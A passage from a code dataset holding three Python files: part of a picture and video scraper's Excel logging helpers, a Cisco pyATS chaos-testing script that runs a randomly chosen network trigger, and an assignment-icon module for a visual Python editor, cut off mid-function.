picture_download_interval, record_type, record_source, record_keyword, record_author, record_title, \\\n record_introduction, record_tags, record_caption, record_url_article, record_url_pic, record_url_local, log_path, \\\n excel_path, download_video_check, requests_timeout\n\nrequests.DEFAULT_RETRIES = 5 # 增加重试连接次数\n\ndef log(message:str):\n with open(log_path, 'a') as f:\n f.write(time.ctime())\n f.write(message + \"\\r\\n\")\n # logging.debug(traceback.format_exc())\n\ndef getResModel(type:str, source:str, keyword:str, author:str,\n title:str, introduction:str, tags:list, caption:str,\n url_article:str, url_pic:str, url_local:str):\n res = {\n record_type: type,\n record_source: source,\n record_keyword: keyword,\n record_author: author,\n record_title: title,\n record_introduction: introduction,\n record_tags: tags,\n record_caption: caption,\n record_url_article: url_article,\n record_url_pic: url_pic,\n record_url_local: url_local,\n }\n return res\n\ndef download_pic(url:str, path:str):\n try:\n r = requests.get(url, timeout=requests_timeout)\n open(path, 'wb').write(r.content) # 将内容写入图片\n except:\n log(traceback.format_exc())\n time.sleep(picture_download_interval) # 停一下,别过分了\n\ndef download_video(video_url: str, path:str, name:str):\n if not download_video_check:\n return\n # 使用sys.argv内置方法,可以在代码中输入CMD命令\n sys.argv = ['you-get', '-o', path, '-O', name, video_url, \"--debug\"]\n # 通过you-get模块,实现下载\n you_get.main()\n\n# excel\nclass Excel:\n # 全部关键词\n keywordDict = {\n # \"设备\":[],\n # \"软件\":[],\n # \"形式\":[],\n # \"类型\":[]\n }\n # 防止重复导入网页记录\n allHttps = dict()\n # 统计tag分布\n allTags = dict()\n\n def __init__(self, path:str):\n self.path = path\n self.excel = openpyxl.load_workbook(path)\n sheetnames = self.excel.sheetnames\n\n self.table = self.excel[sheetnames[0]]\n self.__initHttps()\n\n self.tagTable = self.excel[sheetnames[2]]\n self.__initTags()\n\n self.keywordTable = self.excel[sheetnames[1]]\n self.__initKeyWords()\n\n # 获取实际最大行行号\n def __getMaxRow(self, sheet):\n i = sheet.max_row\n print(\"伪最大行数:\" + str(i))\n real_max_row = 0\n while i > 0:\n # print(i)\n if i % 500 == 0:\n print(\"正在检查有效行:\" + str(i))\n if sheet[i][0].value is None:\n i = i-1\n else:\n real_max_row = i\n break\n print(\"真最大行数:\" + str(real_max_row))\n print(\"*\"*50)\n return real_max_row\n\n # 读取链接记录\n def __initHttps(self):\n self.nrows = self.__getMaxRow(self.table) # 获得行数\n # self.nrows = 1\n self.ncolumns = self.table.max_column # 获得列数\n for i in range(1, self.nrows+1):\n self.__recordHttps(self.table.cell(i,9).value)\n\n # 读取tag记录\n def __initTags(self):\n tagRows = self.__getMaxRow(self.tagTable)\n for i in range(1, tagRows + 1):\n self.allTags[self.tagTable.cell(i, 1).value] = self.tagTable.cell(i, 2).value\n\n # 读取关键词\n def __initKeyWords(self):\n rows = self.__getMaxRow(self.keywordTable)\n column = self.keywordTable.max_column\n for i in range(1, rows+1):\n temp = []\n for j in range(2, column+1):\n try:\n temp.append(self.keywordTable.cell(i,j).value.split(\" \"))\n except:\n # log()\n pass\n self.keywordDict[self.keywordTable.cell(i,1).value] = temp\n\n # 查重\n def checkHttpRepeat(self, url:str):\n return url in self.allHttps.keys()\n\n # 统计新增的网页链接\n def __recordHttps(self, url:str):\n if url in self.allHttps.keys():\n self.allHttps[url] += 1\n # return False\n else:\n self.allHttps[url] = 1\n # return True\n\n # 统计新增的tag\n def __recordTags(self, tag:str):\n if tag in self.allTags.keys():\n self.allTags[tag] += 1\n else:\n self.allTags[tag] = 1\n\n # 因为tags为列表\n def appendTagsFromList(self, tags:list):\n for tag in tags:\n self.__recordTags(tag)\n\n # 保存并记录tags\n def __saveTags(self):\n i = 1\n for key in self.allTags.keys():\n self.tagTable.cell(i, 1).value = key\n self.tagTable.cell(i, 2).value = self.allTags[key]\n i+=1\n\n def appendRecord(self, resDict:dict):\n aim = [resDict[record_type], resDict[record_source], resDict[record_keyword], resDict[record_author],\n resDict[record_title], resDict[record_introduction], \",\".join(resDict[record_tags]),\n resDict[record_caption], resDict[record_url_article],\n resDict[record_url_pic], resDict[record_url_local]]\n column = 1\n self.nrows += 1\n for value in aim:\n self.table.cell(self.nrows, column).value = value\n column += 1\n\n def saveExcel(self):\n self.__saveTags()\n self.excel.save(self.path)\n\nexcel = Excel(excel_path)\n","repo_name":"Maryin-c/KeywordSpider_pictures_videos","sub_path":"tools.py","file_name":"tools.py","file_ext":"py","file_size_in_byte":5594,"program_lang":"python","lang":"en","doc_type":"code","stars":50,"dataset":"github-code","pt":"37"} +{"seq_id":"3089557276","text":"import os\nfrom pyats.datastructures.logic import And, Not, Or\nfrom genie.harness.main import gRun\nimport argparse\n\n# chaos only knows..\nimport random\n\n# how brave are you?\n# comprehensive list of triggers / docs located at\n# https://pubhub.devnetcloud.com/media/pyats-packages/docs/genie/genie_libs/#/triggers\n\nPOSSIBLE_TRIGGERS = [\n 'TriggerClearBgpAll',\n 'TriggerClearIpOspfNeighborVrfAll',\n 'TriggerClearIpRoute',\n 'TriggerUnconfigConfigEvpnVni',\n 'TriggerUnconfigConfigVlanInterface',\n 'TriggerUnconfigConfigVlanVnsegment',\n # 'TriggerClearIpMroute'\n\n]\n\nRANDOM_TRIGGER = random.choice(POSSIBLE_TRIGGERS)\n\n\n\"\"\" KNOWN_ISSUES \"\"\"\n\n\n\"\"\"\n'TriggerUnconfigConfigNvOverlayEvpn'\n\n\n'TriggerUnconfigConfigBgp'\n\n2019-01-16T22:55:58: %AETEST-ERROR: Failed reason: Failed to unconfigure feature\n2019-01-16T22:55:58: %AETEST-ERROR:\n2019-01-16T22:55:58: %AETEST-ERROR: Exception:\n2019-01-16T22:55:58: %AETEST-ERROR: Traceback (most recent call last):\n2019-01-16T22:55:58: %AETEST-ERROR: File \"/Users/kecorbin/VirtualEnvs/netchaos/lib/python3.6/site-packages/genie/libs/sdk/triggers/unconfigconfig/unconfigconfig.py\", line 100, in unconfigure\n2019-01-16T22:55:58: %AETEST-ERROR: self.mapping.unconfigure(device=uut, abstract=abstract, steps=steps)\n2019-01-16T22:55:58: %AETEST-ERROR: File \"/Users/kecorbin/VirtualEnvs/netchaos/lib/python3.6/site-packages/genie/libs/sdk/libs/utils/mapping.py\", line 1071, in unconfigure\n2019-01-16T22:55:58: %AETEST-ERROR: return self.configure(unconfig=True, *args, **kwargs)\n2019-01-16T22:55:58: %AETEST-ERROR: File \"/Users/kecorbin/VirtualEnvs/netchaos/lib/python3.6/site-packages/genie/libs/sdk/libs/utils/mapping.py\", line 1156, in configure\n2019-01-16T22:55:58: %AETEST-ERROR: unconfig, name, **kwarg)\n2019-01-16T22:55:58: %AETEST-ERROR: File \"/Users/kecorbin/VirtualEnvs/netchaos/lib/python3.6/site-packages/genie/libs/sdk/libs/utils/mapping.py\", line 1163, in _configure\n2019-01-16T22:55:58: %AETEST-ERROR: co = abstracted_ops(device=device, **kwargs)\n2019-01-16T22:55:58: %AETEST-ERROR: File \"/Users/kecorbin/VirtualEnvs/netchaos/lib/python3.6/site-packages/genie/libs/conf/bgp/bgp.py\", line 1288, in __init__\n2019-01-16T22:55:58: %AETEST-ERROR: self.bgp_id = int(bgp_id)\n2019-01-16T22:55:58: %AETEST-ERROR: TypeError: int() argument must be a string, a bytes-like object or a number, not 'list'\n\n\"\"\"\n\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument('--trigger',\n dest='trigger',\n default=None)\n # parser.add_argument('--inventory',\n # dest='inventory',\n # default='inventory/test.yaml')\n args, unknown = parser.parse_known_args()\n\n test_path = os.path.dirname(os.path.abspath(__file__))\n # print(args)\n\n # mapping_datafile is mandatory\n # trigger_uids limit which test to execute\n\n if args.trigger:\n trigger = args.trigger\n else:\n trigger = RANDOM_TRIGGER\n\n\n gRun(mapping_datafile=os.path.join(test_path, 'mapping_datafile.yaml'),\n pts_datafile='pts_datafile.yaml',\n pts_features=['ospf', 'bgp'],\n trigger_uids=Or(trigger))\n","repo_name":"CiscoTestAutomation/solutions_examples","sub_path":"netchaos/network_chaos_monkey.py","file_name":"network_chaos_monkey.py","file_ext":"py","file_size_in_byte":3190,"program_lang":"python","lang":"en","doc_type":"code","stars":70,"dataset":"github-code","pt":"37"} +{"seq_id":"70618574187","text":"from PIL import Image\nimport ast\nimport comn\nimport icon\nimport iconlayout\nimport iconsites\nimport nameicons\nimport listicons\nimport opicons\nimport entryicon\nimport parenicon\nimport cursors\n\nassignDragImage = comn.asciiToImage((\n \"......\",\n \"......\",\n \"......\",\n \"......\",\n \"......\",\n \"...ooo\",\n \"..o%%%\",\n \"55%%%.\",\n \"%%%%..\",\n \"55%%%.\",\n \"..o%%%\",\n \"...ooo\",\n \"......\",\n \"......\",\n \"......\",\n \"......\"))\n\ninpSeqImage = comn.asciiToImage((\n \"ooo\",\n \"ooo\",\n \"ooo\",\n \"o o\",\n \"o o\",\n \"o o\",\n \"o o\",\n \"oo.\",\n \"o..\",\n \"...\",\n \"o..\",\n \"oo.\",\n \"o o\",\n \"o o\",\n \"o o\",\n \"ooo\",\n \"ooo\",\n \"ooo\"))\n\nclass AssignIcon(icon.Icon):\n def __init__(self, numTargets=1, window=None, location=None):\n icon.Icon.__init__(self, window)\n opWidth, opHeight = icon.getTextSize('=')\n opWidth += 2*icon.TEXT_MARGIN + 1\n opHeight += 2*icon.TEXT_MARGIN + 1\n siteY = inpSeqImage.height // 2\n self.opSize = (opWidth, opHeight)\n tgtSitesX = assignDragImage.width - 3\n seqSiteX = tgtSitesX + 1\n self.sites.add('seqIn', 'seqIn', seqSiteX, siteY - inpSeqImage.height // 2 + 1)\n self.sites.add('seqOut', 'seqOut', seqSiteX, siteY + inpSeqImage.height//2 - 2)\n self.sites.add('seqInsert', 'seqInsert', 0, siteY)\n self.tgtLists = [iconlayout.ListLayoutMgr(self, 'targets0', tgtSitesX, siteY,\n simpleSpine=True)]\n valueSitesX = tgtSitesX + icon.EMPTY_ARG_WIDTH + opWidth\n self.valueList = iconlayout.ListLayoutMgr(self, 'values', valueSitesX, siteY,\n simpleSpine=True)\n self.dragSiteDrawn = False\n if location is None:\n x = y = 0\n else:\n x, y = location\n width = assignDragImage.width + self.tgtLists[0].width + opWidth - 2 + \\\n self.valueList.width\n self.rect = (x, y, x + width, y + inpSeqImage.height)\n for i in range(1, numTargets):\n self.addTargetGroup(i)\n\n def draw(self, toDragImage=None, location=None, clip=None, style=0):\n needDragSite = toDragImage is not None and self.prevInSeq() is None\n if self.drawList is None or self.dragSiteDrawn and not needDragSite:\n self.drawList = []\n siteY = self.sites.seqInsert.yOffset\n # Left site (seq site bar + 1st target input or drag-insert site\n leftTgtHasSpine = self.tgtLists[0].simpleSpineWillDraw()\n tgtSiteX = self.sites.targets0[0].xOffset\n if leftTgtHasSpine:\n tgtSiteX -= icon.OUTPUT_SITE_DEPTH\n if needDragSite:\n y = siteY - assignDragImage.height // 2\n self.drawList.append(((0, y), assignDragImage))\n elif not leftTgtHasSpine:\n y = siteY - inpSeqImage.height // 2\n self.drawList.append(((tgtSiteX, y), inpSeqImage))\n # Commas, spines and an = for each target group\n txtImg = icon.iconBoxedText('=')\n opWidth, opHeight = txtImg.size\n img = Image.new('RGBA', (opWidth, opHeight), color=(0, 0, 0, 0))\n img.paste(txtImg, (0, 0))\n rInSiteX = opWidth - icon.inSiteImage.width\n rInSiteY = opHeight // 2 - icon.inSiteImage.height // 2\n img.paste(icon.inSiteImage, (rInSiteX, rInSiteY))\n for i, tgtList in enumerate(self.tgtLists):\n self.drawList += tgtList.drawListCommas(tgtSiteX, siteY)\n spines = tgtList.drawSimpleSpine(tgtSiteX, siteY, drawOutputSite=False)\n if i == 0 and leftTgtHasSpine:\n # If the leftmost target list has a spine, drawing of inpSeqImage\n # was skipped, above, and we draw the sequence sites on the spine\n leftSpineImg = spines[0][1]\n icon.drawSeqSites(leftSpineImg, 0, 0, leftSpineImg.height)\n self.drawList += spines\n tgtSiteX += tgtList.width - 1\n self.drawList.append(((tgtSiteX + icon.OUTPUT_SITE_DEPTH,\n siteY - opHeight // 2), img))\n tgtSiteX += opWidth - 1\n self.drawList += self.valueList.drawListCommas(tgtSiteX, siteY)\n self.drawList += self.valueList.drawSimpleSpine(tgtSiteX, siteY)\n self._drawFromDrawList(toDragImage, location, clip, style)\n self._drawEmptySites(toDragImage, clip, hilightEmptySeries=True)\n self.dragSiteDrawn = needDragSite\n\n def addTargetGroup(self, idx):\n if idx < 0 or idx > len(self.tgtLists):\n raise Exception('Bad index for adding target group to assignment icon')\n # Name will be filled in by renumberTargetGroups, offset by layout\n self.tgtLists.insert(idx, iconlayout.ListLayoutMgr(self, 'targetsX', 0, 0,\n simpleSpine=True))\n self.renumberTargetGroups(descending=True)\n self.window.undo.registerCallback(self.removeTargetGroup, idx)\n self.markLayoutDirty()\n\n def removeTargetGroup(self, idx):\n if idx <= 0 or idx >= len(self.tgtLists):\n raise Exception('Bad index for removing target group from assignment icon')\n seriesName = 'targets%d' % idx\n for site in self.sites.getSeries(seriesName):\n if site.att is not None:\n raise Exception('Removing non-empty target group from assignment icon')\n del self.tgtLists[idx]\n self.sites.removeSeries(\"targets%d\" % idx)\n self.renumberTargetGroups()\n self.window.undo.registerCallback(self.addTargetGroup, idx)\n self.markLayoutDirty()\n\n def renumberTargetGroups(self, descending=False):\n tgtLists = list(enumerate(self.tgtLists))\n if descending:\n tgtLists = reversed(tgtLists)\n for i, tgtList in tgtLists:\n oldName = tgtList.siteSeriesName\n newName = \"targets%d\" % i\n if oldName != newName:\n tgtList.rename(newName)\n getattr(self.sites, newName).order = i\n self.sites.values.order = len(self.tgtLists)\n\n def snapLists(self, forCursor=False):\n # Add snap sites for insertion to those representing actual attachment sites\n siteSnapLists = icon.Icon.snapLists(self, forCursor=forCursor)\n insertSites = []\n for tgtList in self.tgtLists:\n insertSites += tgtList.makeInsertSnapList()\n insertSites += self.valueList.makeInsertSnapList()\n siteSnapLists['insertInput'] = insertSites\n # Snap site for seqOut is too close to snap site for inserting the first target.\n # Nudge the seqOut site down and to the left to make it easier to snap to\n ic, (x, y), siteType = siteSnapLists['seqOut'][0]\n siteSnapLists['seqOut'][0] = (ic, (x-1, y+1), siteType)\n return siteSnapLists\n\n def execute(self):\n # Get the target and value icons\n tgtLists = []\n for tgtList in self.tgtLists:\n tgts = []\n for site in getattr(self.sites, tgtList.siteSeriesName):\n if site.att is None:\n raise icon.IconExecException(self, \"Missing assignment target(s)\")\n tgts.append(site.att)\n tgtLists.append(tgts)\n values = []\n for site in self.sites.values:\n if site.att is None:\n raise icon.IconExecException(self, \"Missing assignment value\")\n values.append(site.att)\n # Execute all of the value icons\n executedValues = []\n for value in values:\n executedValues.append(value.execute())\n # Assign the resulting values to the targets\n if len(values) == 1:\n value = executedValues[0]\n else:\n value = tuple(executedValues)\n for tgts in tgtLists:\n if len(tgts) == 1:\n tgtIcon = tgts[0]\n else:\n tgtIcon = tgts\n self.assignValues(tgtIcon, value)\n\n def createAst(self):\n # Get the target and value icons\n tgtLists = []\n for tgtList in self.tgtLists:\n tgts = []\n for site in getattr(self.sites, tgtList.siteSeriesName):\n if site.att is None:\n raise icon.IconExecException(self, \"Missing assignment target(s)\")\n tgts.append(site.att)\n tgtLists.append(tgts)\n values = []\n for site in self.sites.values:\n if site.att is None:\n raise icon.IconExecException(self, \"Missing assignment value\")\n values.append(site.att)\n # Make asts for targets and values, adding tuples if packing/unpacking is\n # specified\n if len(values) == 1:\n valueAst = values[0].createAst()\n else:\n valueAst = ast.Tuple([v.createAst() for v in values], ctx=ast.Load(),\n lineno=self.id, col_offset=0)\n tgtAsts = []\n for tgts in tgtLists:\n perTgtAsts = []\n for tgt in tgts:\n if isinstance(tgt, parenicon.CursorParenIcon):\n perTgtAsts.append(tgt.childAt('argIcon').createAst())\n else:\n perTgtAsts.append(tgt.createAst())\n if len(tgts) == 1:\n tgtAst = perTgtAsts[0]\n else:\n tgtAst = ast.Tuple(perTgtAsts, ctx=ast.Store(), lineno=self.id,\n col_offset=0)\n tgtAsts.append(tgtAst)\n return ast.Assign(tgtAsts, valueAst, lineno=self.id, col_offset=0)\n\n def createSaveText(self, parentBreakLevel=0, contNeeded=True, export=False):\n brkLvl = parentBreakLevel + 1\n text = icon.seriesSaveText(brkLvl, getattr(self.sites,\n self.tgtLists[0].siteSeriesName), contNeeded, export)\n text.add(None, \" = \")\n for tgtList in self.tgtLists[1:]:\n icon.addSeriesSaveText(text, brkLvl,\n getattr(self.sites, tgtList.siteSeriesName), contNeeded, export)\n text.add(None, \" = \")\n icon.addSeriesSaveText(text, brkLvl, self.sites.values, contNeeded, export,\n allowTrailingComma=True)\n return text\n\n def assignValues(self, tgtIcon, value):\n if isinstance(tgtIcon, nameicons.IdentifierIcon):\n try:\n globals()[tgtIcon.name] = value\n except Exception as err:\n raise icon.IconExecException(self, err)\n return\n if tgtIcon.__class__ in (listicons.TupleIcon, listicons.ListIcon):\n assignTargets = tgtIcon.argIcons()\n elif isinstance(tgtIcon, list):\n assignTargets = tgtIcon\n else:\n raise icon.IconExecException(tgtIcon, \"Not a valid assignment target\")\n if not hasattr(value, \"__len__\") or len(assignTargets) != len(value):\n raise icon.IconExecException(self, \"Could not unpack\")\n for target in assignTargets:\n if target is None:\n raise icon.IconExecException(self, \"Missing argument(s)\")\n for t, v in zip(assignTargets, value):\n self.assignValues(t, v)\n\n def doLayout(self, left, top, layout):\n for tgtList in self.tgtLists:\n tgtList.doLayout(layout)\n self.valueList.doLayout(layout)\n opWidth, opHeight = self.opSize\n heightAbove = opHeight // 2\n heightBelow = opHeight - heightAbove\n for tgtList in self.tgtLists:\n heightAbove = max(heightAbove, tgtList.spineTop)\n heightBelow = max(heightBelow, tgtList.spineHeight - tgtList.spineTop)\n heightAbove = max(heightAbove, self.valueList.spineTop)\n heightBelow = max(heightBelow, self.valueList.spineHeight-self.valueList.spineTop)\n leftSpineTop = heightAbove - self.tgtLists[0].spineTop\n self.sites.seqIn.yOffset = leftSpineTop + 1\n self.sites.seqOut.yOffset = leftSpineTop + self.tgtLists[0].spineHeight - 1\n self.sites.seqInsert.yOffset = heightAbove\n layout.updateSiteOffsets(self.sites.seqInsert)\n layout.doSubLayouts(self.sites.seqInsert, left, top + heightAbove)\n height = heightAbove + heightBelow\n width = self.sites.seqIn.xOffset - 1 + layout.width\n self.rect = (left, top, left + width, top + height)\n self.drawList = None\n self.layoutDirty = False\n\n def calcLayouts(self):\n opWidth, opHeight = self.opSize\n tgtListsLayouts = [tgtList.calcLayouts(argRequired=True)\n for tgtList in self.tgtLists]\n valueLayouts = self.valueList.calcLayouts(argRequired=True)\n layouts = []\n for valueLayout, *tgtLayouts in iconlayout.allCombinations(\n (valueLayouts, *tgtListsLayouts)):\n layout = iconlayout.Layout(self, opWidth, opHeight, opHeight // 2)\n # Calculate for assignment target lists (each clause of =)\n if tgtLayouts[0] is not None and len(tgtLayouts[0].rowWidths) >= 2:\n x = 0 # If first target group includes spine, don't offset\n else:\n x = inpSeqImage.width - 1\n for i, tgtLayout in enumerate(tgtLayouts):\n tgtLayout.mergeInto(layout, x, 0)\n x += tgtLayout.width + opWidth - 2\n # Calculate layout for assignment value(s)\n layout.width = x + 1\n valueLayout.mergeInto(layout, x, 0)\n layouts.append(layout)\n return self.debugLayoutFilter(layouts)\n\n def clipboardRepr(self, offset, iconsToCopy):\n return self._serialize(offset, iconsToCopy, numTargets=len(self.tgtLists))\n\n def highlightErrors(self, errHighlight):\n if errHighlight is not None:\n icon.Icon.highlightErrors(self, errHighlight)\n return\n self.errHighlight = None\n for tgtList in self.tgtLists:\n tgtSeries = getattr(self.sites, tgtList.siteSeriesName)\n listicons.highlightSeriesErrorsForContext(tgtSeries, 'store')\n for site in self.sites.values:\n if site.att is not None:\n site.att.highlightErrors(None)\n\n def textRepr(self):\n text = \"\"\n for tgtList in self.tgtLists:\n text += icon.seriesTextRepr(getattr(self.sites, tgtList.siteSeriesName)) + \\\n \" = \"\n return text + icon.seriesTextRepr(self.sites.values)\n\n def backspace(self, siteId, evt):\n siteName, index = iconsites.splitSeriesSiteId(siteId)\n topIcon = self.topLevelParent()\n win = self.window\n win.requestRedraw(topIcon.hierRect())\n #... There's an ugly hack, here, which happened because the original code was\n # written to replace the = with a comma (before entry icon backspacing was\n # established). Instead of rewriting the code, I just added calls to\n # backspaceComma after the existing code. This is wastefull, and will fail if\n # backspaceComma ever adds comma text to the entry icon, which might happen.\n if index == 0:\n if siteName == \"targets0\":\n return\n if siteName == \"values\" and not hasattr(self.sites, 'targets1'):\n # This is the only '=' in the assignment, convert it to a tuple\n argIcons = [tgtSite.att for tgtSite in self.sites.targets0]\n numTargets = len(argIcons)\n argIcons += [valueSite.att for valueSite in self.sites.values]\n newTuple = listicons.TupleIcon(window=win, noParens=True)\n for i, arg in enumerate(argIcons):\n if arg is not None:\n self.replaceChild(None, self.siteOf(arg))\n newTuple.insertChild(arg, \"argIcons\", i)\n self.replaceWith(newTuple)\n cursorSite = iconsites.makeSeriesSiteId('argIcons', numTargets)\n win.cursor.setToIconSite(newTuple, cursorSite)\n newTuple.backspace(cursorSite, evt) # Also handles num args <= 1 case\n else:\n # Merge lists around '=' to convert it to ','\n if siteName == \"values\":\n removetgtGrpIdx = len(self.tgtLists) - 1\n srcSite = \"targets%d\" % removetgtGrpIdx\n destSite = \"values\"\n destIdx = 0\n cursorIdx = len(getattr(self.sites, srcSite))\n else:\n srcSite = siteName\n removetgtGrpIdx = int(siteName[7:])\n destSite = siteName[:7] + str(removetgtGrpIdx - 1)\n destIdx = len(getattr(self.sites, destSite))\n cursorIdx = destIdx\n argIcons = [s.att for s in getattr(self.sites, srcSite)]\n removeFromSite = iconsites.makeSeriesSiteId(srcSite, 0)\n for _ in argIcons:\n self.replaceChild(None, removeFromSite)\n self.insertChildren(argIcons, destSite, destIdx)\n self.removeTargetGroup(removetgtGrpIdx)\n cursorSite = iconsites.makeSeriesSiteId(destSite, cursorIdx)\n win.cursor.setToIconSite(self, cursorSite)\n listicons.backspaceComma(self, cursorSite, evt)\n else:\n # Cursor is on comma input. Delete if empty or previous site is empty\n listicons.backspaceComma(self, siteId, evt)\n return\n\n def touchesPosition(self, x, y):\n # Base class method can figure out from our drawList whether x, y touches the\n # drawn part of the icon, but it can't identify the icon sub-part because our\n # draw-list is unstable (since we sometimes draw a left input site).\n if not icon.pointInRect((x, y), self.rect):\n return None\n if self.drawList is None:\n print('Missing drawlist (%s)?' % self.dumpName())\n partId = 0\n for imgOffset, img in self.drawList:\n if img.width <= assignDragImage.width:\n continue\n partId += 1\n left, top = icon.addPoints(self.rect[:2], imgOffset)\n imgX = x - left\n imgY = y - top\n if icon.pointInRect((imgX, imgY), (0, 0, img.width, img.height)):\n pixel = img.getpixel((imgX, imgY))\n return partId if pixel[3] > 128 else None\n return None\n\n def offsetOfPart(self, partId):\n if self.drawList is None or len(self.drawList) == 0:\n return 0, 0\n iconPartId = 0\n for imgOffset, img in self.drawList:\n if img.width <= assignDragImage.width:\n continue\n iconPartId += 1\n if partId <= iconPartId:\n return imgOffset\n print('assign icon offsetOfPart failed 2')\n return self.drawList[-1][0]\n\nclass AugmentedAssignIcon(icon.Icon):\n def __init__(self, op, window, location=None):\n icon.Icon.__init__(self, window)\n self.op = op\n bodyWidth = icon.getTextSize(self.op + '=')[0] + 2 * icon.TEXT_MARGIN + 1\n bodyHeight = icon.minTxtIconHgt\n self.bodySize = (bodyWidth, bodyHeight)\n siteYOffset = bodyHeight // 2\n targetXOffset = icon.dragSeqImage.width-1 - icon.OUTPUT_SITE_DEPTH\n self.sites.add('targetIcon', 'input', targetXOffset, siteYOffset)\n seqX = icon.dragSeqImage.width - 1\n self.sites.add('seqIn', 'seqIn', seqX, 1)\n self.sites.add('seqOut', 'seqOut', seqX, bodyHeight-2)\n self.sites.add('seqInsert', 'seqInsert', 0, siteYOffset)\n self.targetWidth = icon.EMPTY_ARG_WIDTH\n argX = icon.dragSeqImage.width + self.targetWidth + bodyWidth\n self.valuesList = iconlayout.ListLayoutMgr(self, 'values', argX, siteYOffset,\n simpleSpine=True)\n totalWidth = argX + self.valuesList.width - 2\n x, y = (0, 0) if location is None else location\n self.rect = (x, y, x + totalWidth, y + bodyHeight)\n\n def draw(self, toDragImage=None, location=None, clip=None, style=0):\n if toDragImage is None:\n temporaryDragSite = False\n else:\n # When image is specified the icon is being dragged, and it must display\n # its sequence-insert snap site unless it is in a sequence and not the start.\n self.drawList = None\n temporaryDragSite = self.prevInSeq() is None\n if self.drawList is None:\n self.drawList = []\n bodyWidth, bodyHeight = self.bodySize\n # Left site (seq site bar + 1st target input or drag-insert site\n tgtSiteX = self.sites.targetIcon.xOffset\n tgtSiteY = self.sites.targetIcon.yOffset\n if temporaryDragSite:\n y = tgtSiteY - assignDragImage.height // 2\n self.drawList.append(((0, y), assignDragImage))\n else:\n y = tgtSiteY - inpSeqImage.height // 2\n self.drawList.append(((tgtSiteX, y), inpSeqImage))\n img = Image.new('RGBA', (bodyWidth, bodyHeight), color=(0, 0, 0, 0))\n targetOffset = icon.dragSeqImage.width - 1\n bodyOffset = targetOffset + self.targetWidth - 1\n txtImg = icon.iconBoxedText(self.op + '=')\n img.paste(txtImg, (0, 0))\n inImageX = bodyWidth - icon.inSiteImage.width\n inImageY = bodyHeight // 2 - icon.inSiteImage.height // 2\n img.paste(icon.inSiteImage, (inImageX, inImageY))\n bodyTopY = self.sites.seqIn.yOffset - 1\n self.drawList.append(((bodyOffset, bodyTopY), img))\n # Minimal spines (if list has multi-row layout)\n argsOffset = bodyOffset + bodyWidth - 1 - icon.OUTPUT_SITE_DEPTH\n cntrSiteY = bodyTopY + bodyHeight // 2\n self.drawList += self.valuesList.drawSimpleSpine(argsOffset, cntrSiteY)\n # Commas\n self.drawList += self.valuesList.drawListCommas(argsOffset, cntrSiteY)\n self._drawFromDrawList(toDragImage, location, clip, style)\n self._drawEmptySites(toDragImage, clip, hilightEmptySeries=True)\n if temporaryDragSite:\n self.drawList = None\n\n def snapLists(self, forCursor=False):\n # Add snap sites for insertion\n siteSnapLists = icon.Icon.snapLists(self, forCursor=forCursor)\n siteSnapLists['insertInput'] = self.valuesList.makeInsertSnapList()\n return siteSnapLists\n\n def doLayout(self, left, top, layout):\n self.valuesList.doLayout(layout)\n self.targetWidth = layout.targetWidth\n bodyWidth, bodyHeight = self.bodySize\n heightAbove = bodyHeight // 2\n heightBelow = bodyHeight - heightAbove\n width = icon.dragSeqImage.width - 1 + bodyWidth - 1 + self.targetWidth - 1 + \\\n self.valuesList.width - 1\n if self.valuesList.simpleSpineWillDraw():\n heightAbove = max(heightAbove, self.valuesList.spineTop)\n heightBelow = max(heightBelow, self.valuesList.spineHeight -\n self.valuesList.spineTop)\n self.sites.seqInsert.yOffset = heightAbove\n self.sites.seqIn.yOffset = heightAbove - bodyHeight // 2 + 1\n self.sites.seqOut.yOffset = self.sites.seqIn.yOffset + bodyHeight - 2\n height = heightAbove + heightBelow\n self.rect = (left, top, left + width, top + height)\n layout.updateSiteOffsets(self.sites.seqInsert)\n layout.doSubLayouts(self.sites.seqInsert, left, top + heightAbove)\n self.drawList = None\n self.layoutDirty = False\n\n def calcLayouts(self):\n bodyWidth, bodyHeight = self.bodySize\n valueListLayouts = self.valuesList.calcLayouts(argRequired=True)\n targetIcon = self.sites.targetIcon.att\n tgtLayouts = [None] if targetIcon is None else targetIcon.calcLayouts()\n layouts = []\n for valueListLayout, tgtLayout in iconlayout.allCombinations(\n (valueListLayouts, tgtLayouts)):\n layout = iconlayout.Layout(self, bodyWidth, bodyHeight, 1)\n layout.addSubLayout(tgtLayout, 'targetIcon', 0, 0)\n tgtWidth = icon.EMPTY_ARG_WIDTH if tgtLayout is None else tgtLayout.width\n valuesXOffset = tgtWidth - 1 + bodyWidth - 1\n valueListLayout.mergeInto(layout, valuesXOffset, 0)\n layout.width = valuesXOffset + valueListLayout.width - 1\n layout.targetWidth = tgtWidth\n layouts.append(layout)\n return self.debugLayoutFilter(layouts)\n\n def textRepr(self):\n if self.sites.targetIcon.att is None:\n target = \" \"\n else:\n target = self.sites.targetIcon.att.textRepr()\n argText = icon.seriesTextRepr(self.sites.values)\n return target + ' ' + self.op + '=' + ' ' + argText\n\n def dumpName(self):\n return self.op + '='\n\n def clipboardRepr(self, offset, iconsToCopy):\n return self._serialize(offset, iconsToCopy, op=self.op)\n\n def highlightErrors(self, errHighlight):\n if errHighlight is None:\n self.errHighlight = None\n listicons.highlightErrorsForContext(self.sites.targetIcon, \"store\")\n for site in self.sites.values:\n if site.att is not None:\n site.att.highlightErrors(None)\n else:\n icon.Icon.highlightErrors(self, errHighlight)\n\n def execute(self):\n return None #... no idea what to do here, yet.\n\n def createAst(self):\n # Get the target and value icons\n if self.sites.targetIcon.att is None:\n raise icon.IconExecException(self, \"Missing assignment target\")\n tgtAst = self.sites.targetIcon.att.createAst()\n values = []\n for site in self.sites.values:\n if site.att is None:\n raise icon.IconExecException(self, \"Missing assignment value\")\n values.append(site.att)\n # If there are multiple values, make a tuple out of them\n if len(values) == 1:\n valueAst = values[0].createAst()\n else:\n valueAst = ast.Tuple([v.createAst() for v in values], ctx=ast.Load(),\n lineno=self.id, col_offset=0)\n opAst = opicons.binOpAsts[self.op]()\n return ast.AugAssign(tgtAst, opAst, valueAst, lineno=self.id, col_offset=0)\n\n def createSaveText(self, parentBreakLevel=0, contNeeded=True, export=False):\n brkLvl = parentBreakLevel + 1\n text = icon.argSaveText(brkLvl, self.sites.targetIcon, contNeeded, export)\n text.add(None, \" \" + self.op + \"= \")\n icon.addSeriesSaveText(text, brkLvl, self.sites.values, contNeeded, export,\n allowTrailingComma=True)\n return text\n\n def backspace(self, siteId, evt):\n siteName, index = iconsites.splitSeriesSiteId(siteId)\n if siteName == \"values\" and index == 